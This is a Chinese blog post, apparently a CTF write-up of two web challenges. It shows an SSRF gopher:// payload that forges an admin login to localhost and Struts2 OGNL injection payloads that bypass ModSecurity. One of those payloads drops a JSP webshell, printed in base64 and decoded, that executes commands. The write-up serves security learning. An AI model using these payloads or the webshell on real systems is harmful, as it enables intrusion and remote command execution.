TSCTF 之web萌新瞎扯(二)

最新推荐文章于 2020-12-26 00:26:01 发布
置顶 最新推荐文章于 2020-12-26 00:26:01 发布
阅读量656 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41788666/article/details/80589825
版权

一,emmmmm

    用扫描器扫描敏感目录,可以看到robots协议是开放的,查看robots协议 ,发现里面暴露了敏感目录backup以及phpinfo,访问backup发现里面有数据库备份文件,可以拿到管理员的账号和密码为admin和bupt666,试着去登录,发现

**Warning!** login failed! admin's login ip must be 127.0.0.1 (attention: http server's local port is 80)!

接着去查看phpinfo,发现开了gopher协议,于是我们可以利用gopher协议让服务器post admin的登录包,

首先登录来到后台,抓包记录下当前的sessionid,将cookie删掉后发包,记录下set-cookie的值,然后构造gopher协议

url=gopher://127.0.0.1:80/_POST%20%2findex.php%253Faction%3Dlogin%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A9000%250d%250aCookie%3A%20PHPSESSID%3D169f13c39a9acc14032583cb99595cda%3B%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aContent-Length%3A%2031%250d%250a%250d%250ausername%3Dadmin%26password%3Dbupt666

gopher中的sessionid用的是set-cookie的值,发包的cookie用登录时的sessionid,发完之后,用set-cookie的sessionid登录,既可看到flag。


二,时光机

    是一个struts2的漏洞,需要绕过modsecurity规则,规则hint中已经给出

https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/v3.1/dev/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf

关于漏洞的具体信息以及利用方法

https://paper.seebug.org/241/

但是由于有waf,先有的exp都打不了,需要自己构造ognl表达式,首先需要拿到web应用的目录 官方wp中给出的payload

Content-Type: %{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#a=(new ognl.OgnlContext())).(#path=#a.getClass().getResource("").getPath()).(#os=@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()).(#os.write(#path.getBytes())).(#os.flush())}

拿到目录之后构造ognl表达式写入webshell,并通过webshell执行命令,官方给出的webshell如下

%{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(new java.io.RandomAccessFile("/usr/local/tomcat/webapps/ROOT/shell.jsp","rw")).write(@java.util.Base64@getDecoder().decode("PCUKICAgIGlmKCJkbGl2ZSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpewogICAgICAgIGphdmEuaW8uSW5wdXRTdHJlYW0gaW4gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJpIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsKICAgICAgICBieXRlW10gYiA9IG5ldyBieXRlWzIwNDhdOwogICAgICAgIG91dC5wcmludCgiPHByZT4iKTsKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsKICAgICAgICB9CiAgICAgICAgb3V0LnByaW50KCI8L3ByZT4iKTsKICAgIH0KJT4=")

其中的base64解码如下

<%
    if("dlive".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

然后利用postman posty pwd以及i过去 即可获得flag



Litchi_c
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2018 TSCTF萌新瞎扯
qq_41788666的博客
05-31 662
一. Web1.   Are you in class根据hint猜测应该是构造xff头,查看源代码发现注释删掉注释符号,并构造192网段的xff头,提交得到flag2.   Buy flag进入页面发现要注册,注册页面对age进行了限制,对是否是数字进行了判断,猜测使用了php中的is_numeric函数,用16进制绕过,绕过之后再次使用账号进行登录,发现主页出现了变化,猜测应该是将age带入数...
TSCTF比赛writeup及心得-Web
weixin_34335458的博客
05-11 201
1. 送分题 一开始真没明白为什么叫送分题,后来明白了,泪流满面。。我只想说,查看源码这个事情一辈子都不能忘。 还是推荐以后都用这个,就不会漏了 2.Do you know time 网页显示一张福利图片,下载下来,随便用进制打开图片,翻到最后面,发现了代码,种子确定了,srand就没意义了,种子是由time()函数确定的,发到服务器上总要一点时间,所以我们用time()+...
第五届TSCTF-RE部分题解
WocW的博客
05-13 858
前言 这个周末参加了一下北邮的TSCTF,可以明确感觉到自己目前缺的是处理数据的工具或者是更高的技巧,许许多多的知识待补!有幸认识了在北邮读研的直系学长,也算是一些收获。 RE1 Checkin 分析 elf文件,IDA观察查看程序很简单。没仔细看,先上动调看看。 这里处理的第一步首先循环右移数据 ror flag[x],x 然后是直接进行已知字符对比验证。 exp a=[0x54,0xa9 ...
[wp] SCTF 2018 Zhuanxv
MercyLin的博客
09-18 1840
扫目录发现/list,点进去发现要登陆,抓包发现一个请求为 试一下有没有文件读取漏洞
TSCTF-J 菜鸡的第一个HTML
Lig_HossssT的博客
10-24 202
打开题目 听到歌 点击F12 进入bilibili 由f12看到的内容可知 flag就是歌手名的罗马音nanawoakari 顺便说一句 这个题目描述就是用来生草的XDD
tucao:瞎扯 · 如何正确的吐槽 - 来自知乎日报
05-14
知乎上总有一些幽(dou)默(bi)的回答让我捧腹大笑,自从下载安装了知乎日报后,我明天守着瞎扯专栏,前几天无意发现了知乎日报的 API,便想到了做一个 WEB 专栏的想法,毕竟大家不可能对着 json 看笑话,整个程序很...
各进制数值转换器(进制,八进制,十进制,十六进制)
02-20
简单易懂。不需要安装,各种平台兼容。简单的东西分享给更多的人,本想简单点,可是强迫我20个字符。我也没办法。瞎扯开了。
json转mask的心酸血泪
12-20
掩模是一种值图像,其中1表示目标像素,0表示非目标像素,常用于表示对象的精确边界。在本文中,作者分享了在处理数据集时将JSON标注转换为掩模格式过程中的一些挑战和解决方案。 首先,我们要理解JSON标注通常...
拍拍抢拍小工具-006 简洁版
03-13
)选择抢拍的商品并将地址粘贴至上面,依次输入此商品开始抢拍的小时,分钟,以及秒(必须有值,秒和分钟可以为零),持续时间为分钟,建义不要超过十分钟,默认为五分钟不能为零或负数。 三)点击点击 ,程序会...
营销策划 -知乎-致趣案例.pptx
最新发布
11-10
- 硬广投放于知乎日报开机、Web问答内页底部以及Mobile Web底部,覆盖了多种使用场景。 5. **用户反馈**: - 大多数用户对广告形式和内容表示赞赏,并积极参与互动。 - 部分用户对广告的植入方式、篇幅和趣味性...
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
TSCTF-J 2019】relax
qtL0ng的博客
07-01 352
打开是个没用的网站,扫描一下~ 访问/robots.txt,发现三个文件: User-agent: * Disallow: /relax.php Disallow: /heicore.php Disallow: /flag.php 其中只有/relax.php里有东西,查看源码: 这个是aaencode代码,直接扔进控制台运行,或者在线解密:https://www.qtool.net/decode 整理得: $_ = $_GET['pw']; $__ = $_GET['file']; $___ =
2018西安工业大学第萌新线上赛web WP
极光时流
10-03 4328
赛题网站:http://117.34.116.134/ WBE 榕榕学姐的美好祝愿 打开链接 右击,查看页面源码 得到flag web1 打开,发现  右击,查看源码,在最下面发现flag web2 打开,查看源码,没有发现有用信息 按F12,查看网络,发现Cookie里藏着flag   web3 打开,发现是代码审计题 审计PHP代码,就是要...
DDCTF部分WP
dydxdz的博客
04-22 6008
这周去打了DDCTF,花了一周做出了九道题,完成了1000分的梦想。也算是菜鸡打比赛这么久拿到分数最多的一次了,现记录如下: MISC 1、(╯°□°)╯︵ ┻━┻ (╯°□°)╯︵ ┻━┻ d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1b2e2e5e2b5b4e4b8b7e...
HITCTF 2018 wp [我真是菜鸟]
Assassin
02-02 5764
WEB PHPreading 源码泄露,存在index.php.bak,,解一下base64知道 $flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){die($flag);}die('emmmm'); 输入得到flag BabyEval 看一下泄露了一部分源码 <!-- $str=@(str
CTFHub-SSRF部分(已完结)
热门推荐
feng的博客
09-14 1万+
内网访问 根据题目意思,让我们如访问内网的flag.php,因此抓包进行访问,即可得到flag: 伪协议读取文件 根据题目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。 URL伪协议有如下这些: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 具体的用法请参考SSRF中URL的伪协议 这里我们使用file伪协议从文件系统中读取文件,我们直接抓包读取: 这里其实有点考常识了,因为网站的目录一般都在/var/ww
webshell_某系统绕过waf拿下webshell
weixin_42401178的博客
12-26 598
文章来源:安全先师前言对于一个不怎么拿站的我来说搞一次站点确实费劲。前不久拿了一个站点。分享一下粗略过程。正文小伙伴所在的地方要让搞某系统测试,发到群里让看看。我看了一波貌似没有什么洞洞这让我,想起三年前的某系统的算算术的漏洞于是,想搞一份源代码研究一下这个算算术的这个东东于是操起神器在fofa上找到一个站的可以算算术接下来掏出exp就开始怼。结果显示如下。连接被重置了想到的是某x云。结...
2021机械加工行业数字化白皮书.pdf
06-22
在机械加工行业中,首要的挑战之一是缩短新产品上市时间。市场需求的快速变化要求企业能够迅速响应,提供高效且高质量的产品。例如,汽车行业客户需要在不增加设备投入的情况下,灵活调整产能以应对销售季节性波动,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值